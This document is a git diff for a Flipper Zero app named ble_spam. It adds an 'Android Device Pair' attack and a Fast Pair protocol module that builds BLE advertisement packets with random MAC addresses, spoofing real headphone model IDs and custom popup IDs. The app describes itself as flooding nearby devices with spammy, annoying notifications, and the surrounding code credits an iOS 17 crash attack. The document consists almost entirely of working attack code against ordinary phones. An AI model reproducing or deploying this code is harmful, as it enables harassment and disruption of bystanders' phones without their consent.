diff --git a/applications/external/ble_spam/application.fam b/applications/external/ble_spam/application.fam index 1f0c019f1..d66dbeb14 100644 --- a/applications/external/ble_spam/application.fam +++ b/applications/external/ble_spam/application.fam @@ -6,7 +6,7 @@ App( stack_size=4 * 1024, fap_icon="ble_spam_10px.png", fap_category="Bluetooth", - fap_author="@Willy-JL & @ECTO-1A", + fap_author="@Willy-JL @ECTO-1A @Spooks4576", fap_weburl="https://github.com/Flipper-XFW/Xtreme-Apps/tree/dev/ble_spam", fap_version="2.0", fap_description="Flood BLE advertisements to cause spammy and annoying popups/notifications", diff --git a/applications/external/ble_spam/ble_spam.c b/applications/external/ble_spam/ble_spam.c index 9a440471d..82903121a 100644 --- a/applications/external/ble_spam/ble_spam.c +++ b/applications/external/ble_spam/ble_spam.c @@ -7,7 +7,8 @@ // Hacked together by @Willy-JL // Custom adv API by @Willy-JL (idea by @xMasterX) // iOS 17 Crash by @ECTO-1A -// Research on behaviors and parameters by @Willy-JL and @ECTO-1A +// Android Pairs by @Spooks4576 and @ECTO-1A +// Research on behaviors and parameters by @Willy-JL, @ECTO-1A and @Spooks4576 // Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam typedef struct { @@ -84,6 +85,19 @@ static Attack attacks[] = { }, }, }, + { + .title = "Android Device Pair", + .text = "~15min cooldown, long range", + .payload = + { + .random_mac = true, + .protocol = &ble_spam_protocol_fastpair, + .msg = + { + .fastpair = {}, + }, + }, + }, }; #define ATTACK_COUNT ((signed)COUNT_OF(attacks)) @@ -242,7 +256,7 @@ static void draw_callback(Canvas* canvas, void* ctx) { AlignTop, "App+Spam: \e#WillyJL\e# XFW\n" "Apple+Crash: \e#ECTO-1A\e#\n" - "\n" + "Android: \e#Spooks4576\e#\n" " Version \e#2.0\e#", false); break; diff --git a/applications/external/ble_spam/icons/android.png b/applications/external/ble_spam/icons/android.png new file mode 100644 index 000000000..efd5b28cb Binary files /dev/null and b/applications/external/ble_spam/icons/android.png differ diff --git a/applications/external/ble_spam/protocols/_registry.c b/applications/external/ble_spam/protocols/_registry.c index 2481cf1a4..9ede92816 100644 --- a/applications/external/ble_spam/protocols/_registry.c +++ b/applications/external/ble_spam/protocols/_registry.c @@ -2,6 +2,7 @@ const BleSpamProtocol* ble_spam_protocols[] = { &ble_spam_protocol_continuity, + &ble_spam_protocol_fastpair, }; const size_t ble_spam_protocols_count = COUNT_OF(ble_spam_protocols); diff --git a/applications/external/ble_spam/protocols/_registry.h b/applications/external/ble_spam/protocols/_registry.h index b2e05db88..f4c41c4f4 100644 --- a/applications/external/ble_spam/protocols/_registry.h +++ b/applications/external/ble_spam/protocols/_registry.h @@ -1,9 +1,11 @@ #pragma once #include "continuity.h" +#include "fastpair.h" union BleSpamMsg { ContinuityMsg continuity; + FastpairMsg fastpair; }; extern const BleSpamProtocol* ble_spam_protocols[]; diff --git a/applications/external/ble_spam/protocols/fastpair.c b/applications/external/ble_spam/protocols/fastpair.c new file mode 100644 index 000000000..5cd91dd66 --- /dev/null +++ b/applications/external/ble_spam/protocols/fastpair.c @@ -0,0 +1,72 @@ +#include "fastpair.h" +#include "_registry.h" + +// Hacked together by @Willy-JL and @Spooks4576 +// Documentation at https://developers.google.com/nearby/fast-pair/specifications/introduction + +const char* fastpair_get_name(const BleSpamMsg* _msg) { + const FastpairMsg* msg = &_msg->fastpair; + UNUSED(msg); + return "FastPair"; +} + +void fastpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg) { + const FastpairMsg* msg = _msg ? &_msg->fastpair : NULL; + + uint32_t model_id; + if(msg && msg->model_id != 0x000000) { + model_id = msg->model_id; + } else { + const uint32_t models[] = { + // Genuine devices + 0xCD8256, // Bose NC 700 + 0xF52494, // JBL Buds Pro + 0x718FA4, // JBL Live 300TWS + 0x821F66, // JBL Flip 6 + 0x92BBBD, // Pixel Buds + + // Custom debug popups + 0xAA1FE1, // ClownMaster + 0xAA187F, // VBucks + 0xF38C02, // Boykisser + 0x1448C9, // BLM + 0xD5AB33, // Xtreme + 0x13B39D, // Talking Sasquach + }; + model_id = models[rand() % COUNT_OF(models)]; + } + + uint8_t size = 17; + uint8_t* packet = malloc(size); + uint8_t i = 0; + + packet[i++] = 2; // Size + packet[i++] = 0x01; // AD Type (Flags) + packet[i++] = 0x02 + (0x04 * (rand() % 2)); // GENERAL_DISC_MODE + maybe BR_EDR_NOT_SUPPORTED + + packet[i++] = 3; // Size + packet[i++] = 0x03; // AD Type (Service UUID List) + packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair) + packet[i++] = 0xFE; // ... + + packet[i++] = 6; // Size + packet[i++] = 0x16; // AD Type (Service Data) + packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair) + packet[i++] = 0xFE; // ... + packet[i++] = (model_id >> 0x10) & 0xFF; // Model ID + packet[i++] = (model_id >> 0x08) & 0xFF; // ... + packet[i++] = (model_id >> 0x00) & 0xFF; // ... + + packet[i++] = 2; // Size + packet[i++] = 0x0A; // AD Type (Tx Power Level) + packet[i++] = (rand() % 120) - 100; // -100 to +20 dBm + + *out_size = size; + *out_packet = packet; +} + +const BleSpamProtocol ble_spam_protocol_fastpair = { + .icon = &I_android, + .get_name = fastpair_get_name, + .make_packet = fastpair_make_packet, +}; diff --git a/applications/external/ble_spam/protocols/fastpair.h b/applications/external/ble_spam/protocols/fastpair.h new file mode 100644 index 000000000..6555d0b6b --- /dev/null +++ b/applications/external/ble_spam/protocols/fastpair.h @@ -0,0 +1,11 @@ +#pragma once +#include "_base.h" + +// Hacked together by @Willy-JL and @Spooks4576 +// Documentation at https://developers.google.com/nearby/fast-pair/specifications/introduction + +typedef struct { + uint32_t model_id; +} FastpairMsg; + +extern const BleSpamProtocol ble_spam_protocol_fastpair;